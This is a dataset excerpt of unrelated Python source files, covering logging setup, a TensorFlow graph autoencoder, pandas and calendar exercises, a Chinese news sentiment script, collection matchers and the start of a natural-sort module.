text stringlengths 38 1.54M |
|---|
import logging
from loguru import logger
class InterceptHandler(logging.Handler):
LEVELS_MAP = {
logging.CRITICAL: "CRITICAL",
logging.ERROR: "ERROR",
logging.WARNING: "WARNING",
logging.INFO: "INFO",
logging.DEBUG: "DEBUG",
}
def _get_level(self, record):
return self.LEVELS_MAP.get(record.levelno, record.levelno)
def emit(self, record):
logger_opt = logger.opt(depth=6, exception=record.exc_info)
logger_opt.log(self._get_level(record), record.getMessage())
def setup(level: str = "INFO"):
logging.basicConfig(level=logging.getLevelName(level), handlers=[InterceptHandler()]) # noqa
logger.disable("sqlalchemy.engine.base")
logger.disable("pyrogram")
|
import tensorflow as tf
if tf.__version__.split(".")[0] == "2":
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
import tensorflow.keras as K
else:
import tensorflow.contrib.keras as K
import numpy as np
import joblib
import layers
from tensorflow.python.keras.layers import Dense
def build_placeholders(info, config, batch_size=4, **kwargs):
adj_channel_num = info.adj_channel_num
print(info.adj_channel_num)
encoder_output_dim = 64
preference_list_length = 2
adjs = [
[
[
tf.sparse_placeholder(
tf.float32, name="adj_" + str(a) + "_" + str(b) + "_" + str(p)
)
for a in range(adj_channel_num)
]
for b in range(batch_size)
]
for p in range(preference_list_length)
]
placeholders = {
"adjs": adjs,
"epsilon": tf.placeholder(
tf.float32,
shape=(batch_size, info.graph_node_num, encoder_output_dim),
name="epsilon",
),
"mask": [
tf.placeholder(tf.float32, shape=(batch_size,), name="mask" + "_" + str(p))
for p in range(preference_list_length)
],
"dropout_rate": tf.placeholder(tf.float32, name="dropout_rate"),
"enabled_node_nums": tf.placeholder(
tf.int32, shape=(batch_size,), name="enabled_node_nums"
),
"is_train": tf.placeholder(tf.bool, name="is_train"),
}
placeholders["features"] = [
tf.placeholder(
tf.float32,
shape=(batch_size, info.graph_node_num, info.feature_dim),
name="feature" + "_" + str(p),
)
for p in range(preference_list_length)
]
return placeholders
def encode(name, inputs, info, batch_size):
internal_dim = 64
encoder_output_dim = inputs["encoder_output_dim"]
in_adjs = inputs["adjs"]
features = inputs["features"]
dropout_rate = inputs["dropout_rate"]
is_train = inputs["is_train"]
enabled_node_nums = inputs["enabled_node_nums"]
adj_channel_num = info.adj_channel_num
with tf.variable_scope(name):
layer = features
layer = layers.GraphConv(internal_dim, adj_channel_num)(layer, adj=in_adjs)
layer = layers.GraphBatchNormalization()(
layer, max_node_num=info.graph_node_num, enabled_node_nums=enabled_node_nums
)
layer = tf.tanh(layer)
layer = layers.GraphConv(internal_dim, adj_channel_num)(layer, adj=in_adjs)
layer = layers.GraphBatchNormalization()(
layer, max_node_num=info.graph_node_num, enabled_node_nums=enabled_node_nums
)
layer = tf.tanh(layer)
layer = layers.GraphDense(internal_dim)(layer)
layer = tf.sigmoid(layer)
layer = layers.GraphGather()(layer)
mean_layer = Dense(encoder_output_dim, kernel_initializer="random_uniform")(
layer
)
std_layer = Dense(encoder_output_dim)(layer)
std_layer = tf.nn.softplus(std_layer)
std_layer = tf.sqrt(std_layer)
mean_layer = tf.clip_by_value(mean_layer, -100, 100)
std_layer = tf.clip_by_value(std_layer, -5, 5)
return mean_layer, std_layer
def decode_nodes(name, inputs, info):
dropout_rate = inputs["dropout_rate"]
layer = inputs["input_layer"]
input_dim = inputs["input_layer_dim"]
decoded_output_dim = inputs["output_layer_dim"]
node_num = inputs["decoded_node_num"]
is_train = inputs["is_train"]
enabled_node_nums = inputs["enabled_node_nums"]
with tf.variable_scope(name):
layer = layers.GraphDense(
decoded_output_dim, kernel_initializer="random_uniform", name="dense_1"
)(layer)
return layer
def decode_links(name, inputs, info):
dropout_rate = inputs["dropout_rate"]
internal_dim = 64
layer = inputs["input_layer"]
input_dim = inputs["input_layer_dim"]
is_train = inputs["is_train"]
node_num = inputs["decoded_node_num"]
enabled_node_nums = inputs["enabled_node_nums"]
with tf.variable_scope(name):
layer = layers.GraphDense(internal_dim, name="dense_1")(layer)
layer = layers.GraphBatchNormalization(name="bn_1")(
layer, max_node_num=info.graph_node_num, enabled_node_nums=enabled_node_nums
)
layer = tf.sigmoid(layer)
layer = layers.GraphDense(internal_dim, name="dense_2")(layer)
layer = tf.sigmoid(layer)
# layer=layers.GraphDecoderInnerProd()(layer)
layer = layers.GraphDecoderDistMult()(layer)
return layer
def build_model(placeholders, info, config, batch_size=4, **kwargs):
adj_channel_num = info.adj_channel_num
embedding_dim = 64
## compute output 0
if not info.feature_enabled:
print("[ERROR] not supported yet")
quit()
# encoder
features = placeholders["features"][0]
mask = placeholders["mask"][0]
encoder_output_dim = 64
input_encoder = {
"adjs": placeholders["adjs"][0],
"features": features,
"encoder_output_dim": encoder_output_dim,
"dropout_rate": placeholders["dropout_rate"],
"is_train": placeholders["is_train"],
"enabled_node_nums": placeholders["enabled_node_nums"],
}
layer_mean, layer_std = encode(
"encode_nn", input_encoder, info, batch_size=batch_size
)
# layer_mean: batch_size x dim
# generating node_num vectors
z = layer_mean + layer_std * placeholders["epsilon"] # reparameterization trick
# TODO: use stable cost function
# e=1.0e-10
# klqp_loss_el=1+2*tf.log(layer_std+e)-layer_mean**2-layer_std
# klqp_loss_el=tf.reduce_sum(klqp_loss_el,axis=2)
# klqp_loss_el=tf.reduce_sum(klqp_loss_el,axis=1)
# klqp_loss=-1/2.0*tf.reduce_mean(klqp_loss_el,axis=0)
# layer: batch_size x node_num x dim
## decoder
decoded_node_num = info.graph_node_num
input_decoder = {
"input_layer": z,
"input_layer_dim": 64,
"output_layer_dim": 75,
"decoded_node_num": decoded_node_num,
"dropout_rate": placeholders["dropout_rate"],
"is_train": placeholders["is_train"],
"enabled_node_nums": placeholders["enabled_node_nums"],
}
### decoder for links
decoded_adjs_list = []
for c in range(adj_channel_num):
decoded_adj = decode_links("decode_links_" + str(c), input_decoder, info)
decoded_adjs_list.append(decoded_adj)
decoded_adjs = tf.stack(decoded_adjs_list)
decoded_adjs = tf.transpose(decoded_adjs, [1, 0, 2, 3])
## computing cost
pair_adjs_sp = placeholders["adjs"][1]
pair_features = placeholders["features"][1]
### array of sparse matrices to dense
pair_adjs_list = []
for b in range(batch_size):
adj_y = [
tf.sparse_tensor_to_dense(pair_adjs_sp[b][c], validate_indices=False)
for c in range(adj_channel_num)
]
pair_adjs_list.append(tf.stack(adj_y))
pair_adjs = tf.stack(pair_adjs_list)
#
kl = (0.5 / 70) * tf.reduce_mean(
tf.reduce_sum(1 + 2 * tf.log(layer_std) - tf.square(z) - layer_std, 1), 1
)
#
# adjs: batch_size x channel x N x N
cross_entropy = tf.nn.weighted_cross_entropy_with_logits(
targets=pair_adjs, logits=decoded_adjs, pos_weight=info.pos_weight
)
ae_cost = info.norm * tf.reduce_mean(cross_entropy, axis=[1, 2, 3])
# sum all costs
cost = mask * ae_cost
cost_opt = tf.abs(tf.reduce_mean(cost) - tf.reduce_mean(kl))
cost_sum = tf.reduce_mean(cost)
## TODO: computing metrics
print(decoded_adjs.shape)
print(pair_adjs.shape)
correct_exist = tf.cast(
tf.equal(
tf.reduce_max(decoded_adjs, 1) > 0.0, tf.reduce_max(pair_adjs, 1) > 0.5
),
tf.float32,
)
# correct_count=mask*tf.reduce_sum(tf.reduce_sum(correct_exist,2),1)
correct_count = mask * tf.reduce_mean(correct_exist, axis=[1, 2])
metrics = {}
metrics["correct_count"] = tf.reduce_sum(correct_count)
## TODO: prediction (final result)
prediction = {"feature": features, "dense_adj": tf.sigmoid(decoded_adjs)}
return decoded_adjs, prediction, cost_opt, cost_sum, metrics
|
import sys
import pdb
#pdb.set_trace()
with open(sys.argv[1]) as f:
for line in f:
items = line.split()
sys.stdout.write('chr%s\t%s\t%s\t%s\n' % (items[1],items[3],items[3],items[9])) |
# Generated by Django 3.0.3 on 2020-03-10 17:35
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('webapp', '0003_auto_20200310_1657'),
]
operations = [
migrations.AlterField(
model_name='comment',
name='active',
field=models.BooleanField(default=True),
),
]
|
import pandas as pd
listaVariada=['a',1,2,4.6]
print (listaVariada)
seriesPandas = pd.Series ([1,2,5])
print(seriesPandas)
seriesPandas = pd.Series ([4.6,5.7,0.1])
print(seriesPandas)
dicGanancia ={}
dicGanancia['Enero'] = 4300
dicGanancia['Febrero'] = 4545
dicGanancia['Marzo'] = 2324
dicGanancia['Abril'] = 1244
seriesGananciaPorMes = pd.Series([4300,4545,2324,1244])
print(seriesGananciaPorMes)
seriesGananciaPorMesDic = pd.Series (dicGanancia)
print(seriesGananciaPorMesDic['Enero':'Marzo'])
print(seriesGananciaPorMesDic['Febrero':'Marzo'])
matrizEstudiantes = {
'Grupo1' : ['Karla', 'Mario', 'Laura'],
'Grupo2' : ['Santi', 'Arturo', 'Vale'],
'Grupo3' : ['Juan', 'Melany', 'Laura'],
'Grupo4' : ['Mafer', 'Esteban','Daniel'],
}
dataFrameNombres = pd.DataFrame(matrizEstudiantes)
print (dataFrameNombres)
print(dataFrameNombres['Grupo2'])
print(dataFrameNombres.iloc[1:2])
dicVentasPorMes = {
'Marzo(millones de pesos)' :[1234,4235,3356],
'Abril(millones de pesos)' :[1234,42355,7356],
'Mayo(millones de pesos)' :[4234,4635,1356]
}
dataFrameVentas = pd.DataFrame (dicVentasPorMes, index=['Tomates','Papas','Yuca'])
print(dataFrameVentas)
print(dataFrameVentas.iloc[:2])
|
"""Matchers for testing collections have specific items."""
from h_matchers.matcher.core import Matcher
class AnyIterableWithItemsInOrder(Matcher):
"""Matches any item which contains certain elements in order."""
def __init__(self, items_to_match):
super().__init__(
f"* contains {items_to_match} in any order *",
lambda other: self._contains_in_order(other, items_to_match),
)
@classmethod
def _contains_in_order(cls, container, items_to_match):
"""Check if each item can be found in order in the container.
:param container: An iterable of items to check over
:param items_to_match: An iterable of items to try and match
:return: A boolean indicating whether each item can be matched
"""
# Ensure we can work with generators
try:
container = list(container)
except TypeError:
# It's not even iterable
return False
last_index = None
for item in items_to_match:
try:
last_index = (
container.index(item)
if last_index is None
else container.index(item, last_index)
) + 1
except ValueError:
return False
return True
class AnyIterableWithItems(Matcher):
"""Matches any item which contains certain elements."""
def __init__(self, items_to_match):
super().__init__(
f"* contains {items_to_match} in any order *",
lambda other: self._contains_in_any_order(other, items_to_match),
)
@classmethod
def _contains_in_any_order(cls, container, items_to_match):
# See `containment.md` for a description of this algorithm
try:
container = list(container)
except TypeError:
# Not even an iterable
return False
# Create a tuple of tuples containing the matcher index, and the set of all
# possible indices of items from the container which could be a match. From
# here on in, we deal entirely with indices, no matcher matching will happen
# again.
unsolved = tuple(
(
match_index,
{
item_index
for item_index, item in enumerate(container)
if item == matcher
},
)
for match_index, matcher in enumerate(items_to_match)
)
if matched_item_indices := cls._solve(unsolved=unsolved, solved=[]):
# Update any matchers to have the correct last history entry.
# For each item in items to match which is matcher, set its history
# as if it had just matched against the corresponding item in
# container. This will fix the history we mess up during with
# matching operations creating unsolved above.
for item_to_match, matched_item_index in zip(
items_to_match, matched_item_indices
):
if isinstance(item_to_match, Matcher):
item_to_match.matched_to = [container[matched_item_index]]
return True
return False
@classmethod
def _solve(cls, unsolved: tuple, solved: list):
"""Get the first solution as a mapping from match to item index.
:param unsolved: Tuple of match indicies to set of target indicies
:param solved: Tuple of match indicies to target indicies
:return: Tuple of matching target indices
"""
# If there are no more unsolved parts, we are done! This is the recusion
# base case.
if not unsolved:
return tuple(item_index for _match_index, item_index in sorted(solved))
# Sort our unsolved parts by the number of possibilities they have.
# Solve those with fewer possibilities first as they are less free.
# Separate out the head as the most constrained.
head, *tail = sorted(unsolved, key=lambda item: len(item[1]))
head_pos, head_possibilities = head
for chosen_match in head_possibilities:
# For every possible match from the head we recurse in...
if result := cls._solve(
# Create a new unsolved tuple by removing the match from all the
# other unsolved parts. It's no longer a possibility for them
# another part has matched it against the head.
unsolved=tuple(
(pos, possibility - {chosen_match}) for pos, possibility in tail
),
# Extend the solved parts with the new solution
solved=solved + [(head_pos, chosen_match)],
):
return result
return None
class AnyMappingWithItems(Matcher):
"""Matches any mapping contains specified key value pairs."""
def __init__(self, key_values):
super().__init__(
f"* contains {key_values} *",
lambda other: self._contains_values(other, key_values),
)
@classmethod
def _contains_values(cls, container, key_values):
# Direct dict comparison is 200-300x faster than the more generic
# fallback, which runs a search algorithm. So if we are comparing
# to a plain dict, it's much better
if isinstance(container, dict):
return cls._dict_comparison(container, key_values)
if hasattr(container, "items"):
return cls._mapping_comparison(container, key_values)
return False
@classmethod
def _dict_comparison(cls, container, key_values):
for key, value in key_values.items():
if key not in container:
return False
# Do the comparison backwards to give matchers a chance to kick in
if value != container[key]:
return False
return True
@classmethod
def _mapping_comparison(cls, container, key_values):
flat_key_values = cls._normalise_items(key_values)
items_to_compare = cls._normalise_items(container)
return items_to_compare == AnyIterableWithItems(flat_key_values)
@classmethod
def _normalise_items(cls, mapping):
"""Handle badly behaved items() implementations returning lists."""
return tuple((k, v) for k, v in mapping.items())
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Created on 2018-06-04 11:34:28
# Project: mafengwo
a="http://222.asdsad.com/asda/asdasd"
b=a.replace("://","")
inx=b.find("/")
print(a[:inx+4]) |
#-*- coding:utf-8 -*-
__author__ = 'chengmin'
try:
import psyco
psyco.full()
except ImportError:
pass # psyco not installed so continue as usual
import os
import chardet
import time
from zhtools.langconv import *
import Sentiment
import os
from zhtools.langconv import *
import jieba
#import codecs
#import snownlp
import jieba.posseg as pseg
import time
#t1=time.time()
filelist=os.listdir(os.getcwd())
cixing=["/x","/zg","/uj","/ul","/e","/d","/uz","/y"]#词列表为自己定义要过滤掉的词性
#f=codecs.open("Positive", 'r', encoding='utf-8',errors='ignore')
#from multiprocessing import Pool
#from multiprocessing import Process, Queue
def Worker1(eachfolder,sentiment_value,list_name,title_weight,dict_name):
print("Process ID# %s" % (os.getpid()))
eachfolder_size=len(os.listdir(os.path.join(os.getcwd(),eachfolder)))
for eachfile in os.listdir(os.path.join(os.getcwd(),eachfolder)):
eachfolder_size-=1
print(str(eachfolder_size)+"left.....................^_^")
if 1>0:
with open(os.path.join(os.path.join(os.getcwd(),eachfolder),eachfile),"rb")as fin2:#unicode step1: rb
eachlines=fin2.readlines()
if len(eachlines)==0:
continue
if 1>0:
list_temp = map(lambda a:int(a),[v for i,v in dict_name.items()])
if max(list_temp)<2:
continue
else:
y_indexes=[i for i,v in enumerate(list_name) if int(dict_name[v])<=max(list_temp) and int(dict_name[v])>=2]
for y in y_indexes:
sentiment_value[list_name[y]]=sentiment_value[list_name[y]]+float(ComputeSentiment(eachfolder,eachfile))
else:
pass
else:
continue
return sentiment_value
#print "Parent Process ID# %s" % (os.getppid())
#print "%s will sleep for %s seconds" % (name, seconds)
#def offer(queue):
#queue.put("Hello World")
def LoadPositiveDict():
PositiveDict={}
with open(os.path.join(os.getcwd(),"Positive.txt"))as f:
for each in f.readlines():
if len(each.strip())>1:
PositiveDict[each.strip()]= 1
return PositiveDict
def LoadNegativeDict():
NegativeDict={}
with open(os.path.join(os.getcwd(),"Negative.txt"))as f:
for each in f.readlines():
if len(each.strip())>1:
NegativeDict[each.strip()]= 1
return NegativeDict
def ComputeSentiment(filefolder,filename):
"""
for eachfile in filelist:
if os.path.isdir(eachfile):
continue
if '.py' in eachfile or'.txt' in eachfile:
continue
if 'Positive' in eachfile or 'Negative' in eachfile:
continue
"""
with open(os.path.join(os.path.join(os.getcwd(),filefolder),filename),"r")as fin:#读取文本
#valstring=fin.read().decode("utf-8")
#print(os.path.join(os.getcwd()+'/'+filefolder,filename))
valstring=fin.read()
vallist=valstring.split("###")
#print(vallist)
if len(vallist) < 2: return 9999
#vallist2=vallist[1].strip().split('\t',2)
valstring2=vallist[1].strip()
#print(valstring2)
valstringlist=valstring2.strip().split('\t')
#filter(lambda a:len(a)>1,)
valstringlist1=list(map(lambda a:a.strip(),valstringlist))
valstringlist2=list(filter(lambda a:len(a)>1,valstringlist1))
if len(valstringlist2) == 7:
valstringlist2.pop(0)
valstringlist2.pop(0)
valstringlist2.pop(len(valstringlist2)-1)
valstringlist2.pop(len(valstringlist2)-1)
valstringlist2.pop(len(valstringlist2)-1)
valstringlist2.pop(len(valstringlist2)-1)
elif len(valstringlist2) == 6:
valstringlist2.pop(0)
valstringlist2.pop(0)
valstringlist2.pop(len(valstringlist2)-1)
valstringlist2.pop(len(valstringlist2)-1)
valstringlist2.pop(len(valstringlist2)-1)
elif len(valstringlist2) == 5:
valstringlist2.pop(0)
valstringlist2.pop(0)
valstringlist2.pop(len(valstringlist2)-1)
valstringlist2.pop(len(valstringlist2)-1)
elif len(valstringlist2) == 4:
valstringlist2.pop(0)
valstringlist2.pop(0)
valstringlist2.pop(len(valstringlist2)-1)
valstring3=''.join(valstringlist2)
#jieba.enable_parallel()
words = pseg.cut(valstring3) #进行分词
NumberofWords=0
result1=""
for w in words:
NumberofWords += 1
try:
w.word = Converter('zh-hans').convert(w.word)
except:
pass
temp = unicode(w.word).encode("utf-8")
result1 = result1 + '#@' + str(temp)+"/"+str(w.flag) #加词性标注
#print(words)
#print(NumberofWords)
resultlist1=result1.split('#@')
resultlist1=list(filter(lambda a:len(a)>1,resultlist1))
templist=resultlist1[:]
for segs in templist:
for K in cixing:
if K in segs:
resultlist1.remove(segs)
break
else:
pass
#print(resultlist1)#记录最终结果的变量
#txtlist.extend(line_list)
#with open("t_with_POS_tag.txt","w") as fout: #将结果保存到另一个文档中
#fout.writelines(resultlist1)
TotalCount=0
Positive_Value=0
Negative_Value=0
PositiveDict=LoadPositiveDict()
NegativeDict=LoadNegativeDict()
for each in resultlist1:
if 1>0:
val=each.split('/')
if val[0].strip() in PositiveDict:
Positive_Value=Positive_Value + abs(PositiveDict[val[0].strip()])
TotalCount += 1
#print("Positive_Value is ......................... "+str(Positive_Value)+" -----"+str(val[0]))
if val[0].strip() in NegativeDict:
Negative_Value=Negative_Value + abs(NegativeDict[val[0].strip()])
TotalCount += 1
#print("Negative_Value is ......................... "+str(Negative_Value)+" -----"+str(val[0]))
else:
continue
if TotalCount>0:
#SentimentValue=float(Positive_Value-Negative_Value)#M1.P-N
SentimentValue=float(Positive_Value-Negative_Value)/TotalCount#M2.P-N/count
#SentimentValue=float(Positive_Value-Negative_Value)/(Positive_Value+Negative_Value)#M3.P-N/count
#SentimentValue=float(Positive_Value-Negative_Value)/(Positive_Value+Negative_Value)#M4.P-N/count
else:
SentimentValue=0
#print("Sentiment is ------------------"+str(SentimentValue)+ "----------Total Count is "+str(TotalCount))
return SentimentValue
#t2=time.time()
#print("分词及词性标注完成,耗时:"+str(t2-t1)+"秒。") #反馈结果
def Initlization():
dict_name={}
sentiment_value={}
list_name=[]
title_weight=float(1.234567891234567)
with open(os.path.join(os.getcwd(),"InPut_List.txt"),"rb")as fin1:
for eachline1 in fin1:
#print(eachline1)
#mytype = (chardet.detect(eachline1))['encoding']
val1=eachline1.split('%')
if len(val1) < 2: continue
item1=val1[0].strip()
item2=val1[1].strip()
item=item1+'%'+item2
#print("----------------------------------------------------------------------"+str(item))
#Change to Simplfied-Chinese
#item = Converter('zh-hant').convert(item)
flag=item in dict_name.keys()
if flag==True:
pass
elif flag==False:
dict_name[item]='0'
sentiment_value[item]=0
list_name.append(item)
#list_name=list(set(list_name))
return dict_name,sentiment_value,list_name,title_weight
#Compute how many appearance times for each company in each folder
def Worker2(eachfolder,dict_name,list_name,title_weight):
eachfolder_size=len(os.listdir(os.path.join(os.getcwd(),eachfolder)))
for eachfile in os.listdir(os.path.join(os.getcwd(),eachfolder)):
try:
eachfolder_size-=1
print(str(eachfolder_size)+"left...^_^")
list_temp=[0 for x in range(len(dict_name))]
with open(os.path.join(os.path.join(os.getcwd(),eachfolder),eachfile),"r")as fin2:#unicode step1: rb
eachlines=fin2.readlines()
#eachlines=eachlines.decode("utf-8")
if len(eachlines)==0:
continue
mytype=chardet.detect(eachlines[0])["encoding"]#unicode step2:detect type using chardet
try:
eachlines=eachlines[0].decode(mytype).encode("utf-8")
except:
pass
#eachlines=eachlines[0].decode(mytype).encode("utf-8").decode("utf-8")#unicode step3:first decode from mytype to unicode/which is str
for x in range(len(dict_name)):#find the company name is shown in content and compute the times
try:
tempitem1,tempitem2=list_name[x].strip().split('%')
if tempitem1==tempitem2:
#print(chardet.detect(eachlines)["encoding"])
list_temp[x]=list_temp[x]+eachlines.count(tempitem1)
list_temp[x]=list_temp[x]+eachfile.count(tempitem1)*title_weight#compute the value that company name shown in title
else:
list_temp[x]=list_temp[x]+eachlines.count(tempitem1)+eachlines.count(tempitem2)
list_temp[x]=list_temp[x]+(eachfile.count(tempitem1)+eachfile.count(tempitem2))*title_weight
except:
continue
if max(list_temp)<2:
continue
else:
y_indexes=[i for i,v in enumerate(list_temp) if v==max(list_temp)]
for y in y_indexes:
#if list_name[y]=="萬科":
#hh.append(eachfile)
dict_name[list_name[y]]=str(int(dict_name[list_name[y]])+1)
#sentiment_value[list_name[y]]=sentiment_value[list_name[y]]+ComputeSentiment(eachfolder,eachfile)
#temp_i=y_indexes[0]
#dict_name[list_name[temp_i]]=str(int(dict_name[list_name[temp_i]])+1)
#sentiment_value[list_name[temp_i]]=sentiment_value[list_name[temp_i]]+Sentiment.ComputeSentiment(eachfolder,eachfile)
#print(eachfile+"---"+list_name[temp_i]+str(max(list_temp)))
#print(y_indexes)
except:
continue
return dict_name
def Worker3(eachfolder):
dict_name,sentiment_value,list_name,title_weight=Initlization()
#child_proc1 = Process(target=Worker1, args=(eachfolder,sentiment_value,list_name,title_weight))
#child_proc2 = Process(target=Worker2, args=(eachfolder,dict_name,list_name,title_weight))
#child_proc1.start()
#child_proc2.start()
dict_name=Worker2(eachfolder,dict_name,list_name,title_weight)
sentiment_value=Worker1(eachfolder,sentiment_value,list_name,title_weight,dict_name)
#sentiment_value=Worker1(eachfolder)
#child_proc2.join(10000)
#time.sleep(100000000)
#print(dict_name)
#print(sentiment_value)
return dict_name,sentiment_value
#os.chdir("/home/cityu/wisenewscode")
start=time.clock()
folders=[x for x in os.listdir(os.getcwd()) if os.path.isdir(x)==True and '2014~~2015' in x]
for eachfolder in folders:
print(eachfolder+" is processing")
dict_name,sentiment_value=Worker3(eachfolder)
print("------------------------------------------------------------------>>>")
with open(os.path.join(os.getcwd(),eachfolder+"_M2.txt"),'w')as fout2:
for (k,v) in dict_name.items():
fout2.write(k+'\t\t'+v+'\t\t'+str(sentiment_value[k])+'\n')
end=time.clock()
print("The total time is "+str(end-start)+" secs...")
|
'''
Created on 2012-4-21
@author: Sky
'''
from SimpleMUD.EntityDatabase import EntityDatabase
from BasicLib.BasicLibString import ParseWord
from SimpleMUD.Store import Store
from BasicLib.BasicLibLogger import USERLOG
class StoreDatabase(EntityDatabase):
def Load(self):
sr = EntityDatabase.Sr
for i in range(0, sr.llen("StoreList")):
id1 = sr.lindex("StoreList", i)
store = Store()
store.SetId(id1)
store.Load(sr)
self.m_map[id1] = store
USERLOG.Log("Loaded Store: " + store.GetName())
return True
storeDatabase = StoreDatabase()
|
#
# Example file for working with Calendars
#
# import the calendar module
import calendar
# create a plain text calendar
c = calendar.TextCalendar(calendar.MONDAY)
string = c.formatmonth(1992, 2, 0, 0)
print(string)
# create an HTML formatted calendar
hc = calendar.HTMLCalendar(calendar.SUNDAY)
string = hc.formatmonth(1992,2)
print(string)
# loop over the days of a month
# zeroes mean that the day of the week is in an overlapping month
for i in c.itermonthdays(1992,2):
print(i)
# The Calendar module provides useful utilities for the given locale,
# such as the names of days and months in both full and abbreviated forms
for name in calendar.month_name:
print(name)
for day in calendar.day_name:
print(day)
# Calculate days based on a rule: For example, consider
# a team meeting on the first Friday of every month.
# To figure out what days that would be for each month,
# we can use this script:
print("Team meetings will be on: ")
for m in range(1,13): #13 will not be included because it stops when m reaches 13
cal = calendar.monthcalendar(2020, m) #Returns a matrix representing a month’s calendar.
#Each row represents a week; days outside of the month a represented by zeros.
#Each week begins with Monday unless set by setfirstweekday().
weekone = cal[0] #friday has to be in one of the first 2 weeks because the month could have started on a saturday
weektwo = cal[1]
#say weekone began on saturday its list would look like [0,0,0,0,0,1,1]
#by calling Calendar.FRIDAY it checks the 5th place in the list to see if its a 1 or zero
if weekone[calendar.FRIDAY] != 0:
meetday = weekone[calendar.FRIDAY]
else:
meetday = weektwo[calendar.FRIDAY]
print("%10s %2d" % (calendar.month_name[m], meetday)) |
# false.py
# A program to output whether a statement is true or false
# Author: Andy Walker
# these lines get the input
firstNumber = int(input("Please enter the first number: "))
print ("The first number is {}".format(firstNumber))
secondNumber = int(input("Please enter the second number: "))
print ("The second number is {}".format(secondNumber))
# this line provides the answer
print ("Are the numbers the same? \n{}".format(firstNumber == secondNumber)) |
__title__ = "Optimum polynomial"
def solve():
from common import log
param = [1, -1, 1, -1, 1, -1, 1, -1, 1, -1, 1]
#param = [0, 0, 0, 1]
def u(n):
l = len(param)
s = 0
nn = 1
i = 0
while i < l:
s = s + nn*param[i]
i = i + 1
nn = nn*n
return s
def get_next_seq(seq):
return [seq[i]-seq[i-1] for i in range(1, len(seq))]
seq = map(u, range(1, len(param)))
for i in range(1, len(param)):
log("u(%02d) = %d" % (i, seq[i-1]))
grid = []
grid.append(seq)
log(seq)
for i in range(0, len(seq)-1):
grid.append(get_next_seq(grid[i]))
log(grid[i+1])
return sum([sum(grid[line]) for line in range(0, len(grid))])
|
# -*- coding: utf-8 -*-
"""
Natsort can sort strings with numbers in a natural order.
It provides the natsorted function to sort strings with
arbitrary numbers.
You can mix types with natsorted. This can get around the new
'unorderable types' issue with Python 3. Natsort will recursively
descend into lists of lists so you can sort by the sublist contents.
See the README or the natsort homepage for more details.
"""
from __future__ import print_function, division, unicode_literals, absolute_import
import re
import sys
from operator import itemgetter
from numbers import Number
from itertools import islice
from .py23compat import u_format, py23_basestring, py23_range, py23_str, py23_zip
__doc__ = u_format(__doc__) # Make sure the doctest works for either python2 or python3
# The regex that locates floats
float_sign_exp_re = re.compile(r'([-+]?\d*\.?\d+(?:[eE][-+]?\d+)?)')
float_nosign_exp_re = re.compile(r'(\d*\.?\d+(?:[eE][-+]?\d+)?)')
float_sign_noexp_re = re.compile(r'([-+]?\d*\.?\d+)')
float_nosign_noexp_re = re.compile(r'(\d*\.?\d+)')
# Integer regexes
int_nosign_re = re.compile(r'(\d+)')
int_sign_re = re.compile(r'([-+]?\d+)')
# This dict will help select the correct regex and number conversion function.
regex_and_num_function_chooser = {
(float, True, True) : (float_sign_exp_re, float),
(float, True, False) : (float_sign_noexp_re, float),
(float, False, True) : (float_nosign_exp_re, float),
(float, False, False) : (float_nosign_noexp_re, float),
(int, True, True) : (int_sign_re, int),
(int, True, False) : (int_sign_re, int),
(int, False, True) : (int_nosign_re, int),
(int, False, False) : (int_nosign_re, int),
(None, True, True) : (int_nosign_re, int),
(None, True, False) : (int_nosign_re, int),
(None, False, True) : (int_nosign_re, int),
(None, False, False) : (int_nosign_re, int),
}
def _remove_empty(s):
"""Remove empty strings from a list."""
while True:
try:
s.remove('')
except ValueError:
break
return s
def _number_finder(s, regex, numconv, py3_safe):
"""Helper to split numbers"""
# Split. If there are no splits, return now
s = regex.split(s)
if len(s) == 1:
return tuple(s)
# Now convert the numbers to numbers, and leave strings as strings
s = _remove_empty(s)
for i in py23_range(len(s)):
try:
s[i] = numconv(s[i])
except ValueError:
pass
# If the list begins with a number, lead with an empty string.
# This is used to get around the "unorderable types" issue.
# The _py3_safe function inserts "" between numbers in the list,
# and is used to get around "unorderable types" in complex cases.
# It is a separate function that needs to be requested specifically
# because it is expensive to call.
if not isinstance(s[0], py23_basestring):
return _py3_safe([''] + s) if py3_safe else [''] + s
else:
return _py3_safe(s) if py3_safe else s
def _py3_safe(parsed_list):
"""Insert '' between two numbers."""
if len(parsed_list) < 2:
return parsed_list
else:
new_list = [parsed_list[0]]
nl_append = new_list.append
for before, after in py23_zip(islice(parsed_list, 0, len(parsed_list)-1),
islice(parsed_list, 1, None)):
if isinstance(before, Number) and isinstance(after, Number):
nl_append("")
nl_append(after)
return new_list
@u_format
def natsort_key(s, number_type=float, signed=True, exp=True, py3_safe=False):
"""\
Key to sort strings and numbers naturally, not lexicographically.
It is designed for use in passing to the 'sorted' builtin or
'sort' attribute of lists.
s
The value used by the sorting algorithm
number_type (None, float, int)
The types of number to sort on: float searches for floating point
numbers, int searches for integers, and None searches for digits
(like integers but does not take into account negative sign).
None is a shortcut for number_type = int and signed = False.
signed (True, False)
By default a '+' or '-' before a number is taken to be the sign
of the number. If signed is False, any '+' or '-' will not be
considered to be part of the number, but as part part of the string.
exp (True, False)
This option only applies to number_type = float. If exp = True,
a string like "3.5e5" will be interpreted as 350000, i.e. the
exponential part is considered to be part of the number.
If exp = False, "3.5e5" is interpreted as (3.5, "e", 5).
The default behavior is exp = True.
py3_safe (True, False)
This will make the string parsing algorithm be more careful by
placing an empty string between two adjacent numbers after the
parsing algorithm. This will prevent the "unorderable types" error.
returns
The modified value with numbers extracted.
Using natsort_key is just like any other sorting key in python
>>> a = ['num3', 'num5', 'num2']
>>> a.sort(key=natsort_key)
>>> a
[{u}'num2', {u}'num3', {u}'num5']
It works by separating out the numbers from the strings
>>> natsort_key('num2')
({u}'num', 2.0)
If you need to call natsort_key with the number_type argument, or get a special
attribute or item of each element of the sequence, the easiest way is to make a
lambda expression that calls natsort_key::
>>> from operator import itemgetter
>>> a = [['num4', 'b'], ['num8', 'c'], ['num2', 'a']]
>>> f = itemgetter(0)
>>> a.sort(key=lambda x: natsort_key(f(x), number_type=int))
>>> a
[[{u}'num2', {u}'a'], [{u}'num4', {u}'b'], [{u}'num8', {u}'c']]
Iterables are parsed recursively so you can sort lists of lists.
>>> natsort_key(('a1', 'a10'))
(({u}'a', 1.0), ({u}'a', 10.0))
